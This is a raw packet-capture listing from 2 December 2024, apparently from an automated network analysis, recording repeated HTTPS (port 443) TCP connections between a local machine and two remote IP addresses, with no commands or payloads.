                                                          Dec 2, 2024 17:57:07.915275097 CET4434990713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:07.918308973 CET49912443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:07.918361902 CET4434991213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:07.918453932 CET49912443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:07.918634892 CET49912443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:07.918653965 CET4434991213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:08.368449926 CET4434990813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:08.369466066 CET49908443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:08.369503975 CET4434990813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:08.370814085 CET49908443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:08.370820999 CET4434990813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:08.622611046 CET4434990913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:08.623323917 CET49909443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:08.623353958 CET4434990913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:08.624691963 CET49909443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:08.624697924 CET4434990913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:08.749964952 CET4434991013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:08.750638962 CET49910443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:08.750719070 CET4434991013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:08.752032042 CET49910443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:08.752048016 CET4434991013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:08.804100037 CET4434990813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:08.807432890 CET4434990813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:08.807482004 CET4434990813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:08.807502031 CET49908443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:08.807549000 CET49908443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:08.807626963 CET49908443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:08.807646990 CET4434990813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:08.807661057 CET49908443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:08.807667017 CET4434990813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:08.811439037 CET49913443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:08.811490059 CET4434991313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:08.811589003 CET49913443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:08.811722994 CET49913443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:08.811738968 CET4434991313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.076783895 CET4434990913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.079744101 CET4434990913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.079821110 CET49909443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:09.079871893 CET49909443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:09.079871893 CET49909443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:09.079901934 CET4434990913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.079911947 CET4434990913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.083619118 CET49914443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:09.083657026 CET4434991413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.083744049 CET49914443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:09.083923101 CET49914443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:09.083939075 CET4434991413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.202382088 CET4434991013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.205426931 CET4434991013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.205475092 CET4434991013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.205476999 CET49910443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:09.205523014 CET49910443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:09.205562115 CET49910443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:09.205583096 CET4434991013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.205594063 CET49910443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:09.205599070 CET4434991013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.210119009 CET49915443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:09.210160017 CET4434991513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.210258007 CET49915443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:09.210896969 CET49915443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:09.210910082 CET4434991513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.220957041 CET4434991113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.221498013 CET49911443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:09.221518993 CET4434991113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.222786903 CET49911443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:09.222791910 CET4434991113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.707003117 CET4434991213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.707643986 CET49912443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:09.707662106 CET4434991213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.708331108 CET49912443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:09.708337069 CET4434991213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.779797077 CET4434991113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.783802986 CET4434991113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.783998013 CET49911443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:09.784034967 CET49911443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:09.784034967 CET49911443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:09.784054995 CET4434991113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.784065008 CET4434991113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.788299084 CET49916443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:09.788333893 CET4434991613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:09.788394928 CET49916443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:09.788522005 CET49916443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:09.788537979 CET4434991613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:10.152867079 CET4434991213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:10.155755997 CET4434991213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:10.155827045 CET49912443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:10.155889988 CET49912443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:10.155911922 CET4434991213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:10.155924082 CET49912443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:10.155932903 CET4434991213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:10.159050941 CET49917443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:10.159092903 CET4434991713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:10.159179926 CET49917443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:10.159346104 CET49917443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:10.159359932 CET4434991713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:10.559268951 CET4434991313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:10.560293913 CET49913443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:10.560333967 CET4434991313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:10.561615944 CET49913443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:10.561634064 CET4434991313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:10.995198965 CET4434991413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:10.995721102 CET49914443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:10.995740891 CET4434991413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:10.996316910 CET49914443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:10.996321917 CET4434991413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.004558086 CET4434991313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.007525921 CET4434991313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.007626057 CET49913443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:11.007797956 CET49913443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:11.007814884 CET4434991313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.014005899 CET49918443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:11.014058113 CET4434991813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.014195919 CET49918443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:11.014555931 CET49918443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:11.014571905 CET4434991813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.132879972 CET4434991513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.133791924 CET49915443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:11.133821964 CET4434991513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.134387970 CET49915443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:11.134401083 CET4434991513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.448904037 CET4434991413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.452919006 CET4434991413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.452980042 CET4434991413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.453022003 CET49914443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:11.453140974 CET49914443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:11.453332901 CET49914443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:11.453351974 CET4434991413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.459794998 CET49919443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:11.459850073 CET4434991913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.459999084 CET49919443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:11.460517883 CET49919443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:11.460531950 CET4434991913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.590795040 CET4434991513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.594693899 CET4434991513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.594810009 CET49915443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:11.594897985 CET49915443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:11.594914913 CET4434991513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.594948053 CET49915443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:11.594954014 CET4434991513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.601583958 CET49920443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:11.601623058 CET4434992013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.601761103 CET49920443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:11.602125883 CET49920443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:11.602138042 CET4434992013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.666121006 CET4434991613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.666769981 CET49916443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:11.666790962 CET4434991613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.667097092 CET49916443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:11.667102098 CET4434991613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.932071924 CET4434991713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.933208942 CET49917443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:11.933244944 CET4434991713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:11.934573889 CET49917443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:11.934580088 CET4434991713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:12.132765055 CET4434991613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:12.135756969 CET4434991613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:12.135833025 CET4434991613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:12.135849953 CET49916443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:12.135972023 CET49916443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:12.136143923 CET49916443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:12.136163950 CET4434991613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:12.142535925 CET49921443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:12.142584085 CET4434992113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:12.142714977 CET49921443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:12.143153906 CET49921443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:12.143170118 CET4434992113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:12.369993925 CET4434991713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:12.372771025 CET4434991713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:12.372852087 CET49917443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:12.372889996 CET49917443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:12.372915030 CET4434991713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:12.372930050 CET49917443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:12.372936010 CET4434991713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:12.376189947 CET49922443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:12.376250029 CET4434992213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:12.376329899 CET49922443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:12.376502991 CET49922443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:12.376519918 CET4434992213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:12.733721018 CET4434991813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:12.734153986 CET49918443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:12.734174967 CET4434991813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:12.734596014 CET49918443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:12.734601021 CET4434991813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.169428110 CET4434991813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.172838926 CET4434991813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.172916889 CET49918443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.172974110 CET49918443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.172986031 CET4434991813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.172993898 CET49918443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.172998905 CET4434991813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.175458908 CET49923443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.175503016 CET4434992313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.175568104 CET49923443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.175705910 CET49923443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.175719023 CET4434992313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.282584906 CET4434991913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.282988071 CET49919443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.283031940 CET4434991913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.283421993 CET49919443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.283427000 CET4434991913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.504302025 CET4434992013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.504935026 CET49920443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.504955053 CET4434992013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.505405903 CET49920443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.505412102 CET4434992013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.584403038 CET49924443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:57:13.584434986 CET44349924142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:57:13.584520102 CET49924443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:57:13.584724903 CET49924443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:57:13.584738970 CET44349924142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:57:13.732541084 CET4434991913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.735683918 CET4434991913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.735742092 CET49919443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.735855103 CET49919443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.735876083 CET4434991913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.735887051 CET49919443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.735892057 CET4434991913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.738451004 CET49925443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.738492966 CET4434992513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.738579988 CET49925443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.738708973 CET49925443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.738723993 CET4434992513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.929435968 CET4434992113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.929970026 CET49921443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.930003881 CET4434992113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.930309057 CET49921443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.930315018 CET4434992113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.950237989 CET4434992013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.953351021 CET4434992013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.953509092 CET49920443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.953510046 CET49920443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.953510046 CET49920443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.955859900 CET49926443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.955955982 CET4434992613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:13.956043959 CET49926443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.956176043 CET49926443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:13.956196070 CET4434992613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:14.228126049 CET4434992213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:14.228526115 CET49922443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:14.228552103 CET4434992213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:14.229068995 CET49922443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:14.229074955 CET4434992213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:14.255172014 CET49920443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:14.255188942 CET4434992013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:14.368002892 CET4434992113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:14.371114016 CET4434992113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:14.371198893 CET49921443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:14.371247053 CET49921443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:14.371247053 CET49921443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:14.371273041 CET4434992113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:14.371282101 CET4434992113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:14.373651981 CET49927443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:14.373702049 CET4434992713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:14.373778105 CET49927443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:14.373929024 CET49927443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:14.373938084 CET4434992713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:14.825504065 CET4434992213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:14.828619003 CET4434992213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:14.828680038 CET49922443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:14.828735113 CET49922443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:14.828752041 CET4434992213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:14.828764915 CET49922443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:14.828769922 CET4434992213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:14.832470894 CET49928443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:14.832504034 CET4434992813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:14.832570076 CET49928443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:14.832691908 CET49928443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:14.832705021 CET4434992813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:14.958823919 CET4434992313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:14.959451914 CET49923443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:14.959470987 CET4434992313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:14.960799932 CET49923443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:14.960804939 CET4434992313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:15.368299961 CET44349924142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:57:15.368911982 CET49924443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:57:15.368930101 CET44349924142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:57:15.369271040 CET44349924142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:57:15.370075941 CET49924443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:57:15.370136976 CET44349924142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:57:15.411556005 CET49924443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:57:15.470521927 CET4434992313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:15.473511934 CET4434992313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:15.473576069 CET49923443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:15.473742008 CET49923443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:15.473742008 CET49923443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:15.473762989 CET4434992313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:15.473773003 CET4434992313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:15.478400946 CET49929443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:15.478450060 CET4434992913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:15.478533030 CET49929443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:15.478715897 CET49929443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:15.478730917 CET4434992913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:15.523523092 CET4434992513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:15.524143934 CET49925443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:15.524171114 CET4434992513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:15.525387049 CET49925443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:15.525393009 CET4434992513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:15.744590998 CET4434992613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:15.745249033 CET49926443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:15.745280981 CET4434992613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:15.746592045 CET49926443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:15.746598005 CET4434992613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:15.970794916 CET4434992513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:15.973732948 CET4434992513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:15.973779917 CET4434992513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:15.973886013 CET49925443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:15.973886013 CET49925443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:15.973972082 CET49925443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:15.973992109 CET4434992513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:15.974001884 CET49925443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:15.974005938 CET4434992513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:15.976376057 CET49930443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:15.976412058 CET4434993013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:15.976492882 CET49930443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:15.976644993 CET49930443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:15.976660013 CET4434993013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:16.156435013 CET4434992713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:16.156924009 CET49927443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:16.156951904 CET4434992713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:16.157356024 CET49927443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:16.157361031 CET4434992713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:16.198936939 CET4434992613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:16.202085018 CET4434992613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:16.202256918 CET49926443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:16.202256918 CET49926443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:16.202256918 CET49926443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:16.204737902 CET49931443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:16.204766989 CET4434993113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:16.204854012 CET49931443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:16.204999924 CET49931443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:16.205010891 CET4434993113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:16.505146980 CET49926443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:16.505179882 CET4434992613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:16.600759983 CET4434992713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:16.604324102 CET4434992713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:16.604542017 CET49927443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:16.604630947 CET49927443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:16.604644060 CET4434992713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:16.604691029 CET49927443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:16.604696035 CET4434992713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:16.611015081 CET49932443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:16.611046076 CET4434993213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:16.611183882 CET49932443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:16.611618042 CET49932443192.168.2.413.107.246.63
